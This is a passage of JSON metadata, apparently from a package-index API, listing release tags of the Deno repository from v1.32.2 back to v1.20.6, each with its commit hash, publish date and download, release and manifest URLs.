s_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t